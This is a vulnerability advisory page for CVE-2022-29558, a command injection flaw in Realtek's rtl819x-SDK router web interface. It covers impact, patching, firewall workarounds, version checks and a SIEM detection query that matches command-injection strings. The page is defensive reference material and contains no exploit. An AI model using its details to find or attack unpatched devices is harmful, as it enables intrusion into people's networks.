Login Sign Up

CVE-2022-29558

8.8 HIGH
Remote Code Execution

📋 TL;DR

CVE-2022-29558 is a command injection vulnerability in Realtek's rtl819x-SDK web interface that allows attackers to execute arbitrary commands on affected devices. This affects routers and access points using Realtek's SDK before version 3.6.1. Attackers can potentially gain full control of vulnerable devices.

💻 Affected Systems

Products:
  • Realtek rtl819x-SDK based routers and access points
Versions: All versions before v3.6.1
Operating Systems: Embedded Linux systems
Default Config Vulnerable: ⚠️ Yes
Notes: Devices with web management interface enabled are vulnerable. Many consumer and SOHO routers use this SDK.

📦 What is this software?

Rtl819x Software Development Kit by Realtek

View all CVEs affecting Rtl819x Software Development Kit →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing persistent backdoor installation, network pivoting, credential theft, and participation in botnets.

🟠

Likely Case

Remote code execution leading to device takeover, network traffic interception, and lateral movement within the network.

🟢

If Mitigated

Limited impact if web interface is disabled or network segmentation prevents access to vulnerable interfaces.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires access to the web interface but authentication status may vary by device implementation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: v3.6.1 or later

Vendor Advisory: https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2022-29558.pdf

Restart Required: Yes

Instructions:

1. Contact device manufacturer for firmware updates. 2. Apply firmware update to affected devices. 3. Reboot devices after update. 4. Verify version is 3.6.1 or higher.

🔧 Temporary Workarounds

Disable Web Management Interface

all

Disable the vulnerable web interface if not required for operations

Device-specific - consult manufacturer documentation

Network Segmentation

linux

Restrict access to management interfaces using firewall rules

iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

  • Implement strict network access controls to limit who can reach the web interface
  • Monitor for suspicious web interface activity and command execution attempts

🔍 How to Verify

Check if Vulnerable:

Check device firmware version against Realtek SDK version. If using SDK version <3.6.1, device is vulnerable.

Check Version:

Device-specific - typically available in web interface or via SSH: cat /proc/version or similar

Verify Fix Applied:

Verify firmware version shows SDK 3.6.1 or higher after update

📡 Detection & Monitoring

Log Indicators:

  • Unusual command execution in web interface logs
  • Suspicious POST requests to web management endpoints
  • Unexpected system command execution

Network Indicators:

  • Unusual outbound connections from routers
  • Traffic to known malicious IPs from router
  • Unexpected port scans originating from router

SIEM Query:

source="router_logs" AND ("cmd=" OR "exec=" OR "system(") AND status=200

📊 Metadata

CVE ID: CVE-2022-29558
CVSS v3 Score: 8.8 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-77
Published: July 28, 2022
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-29558, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)
CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)
CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)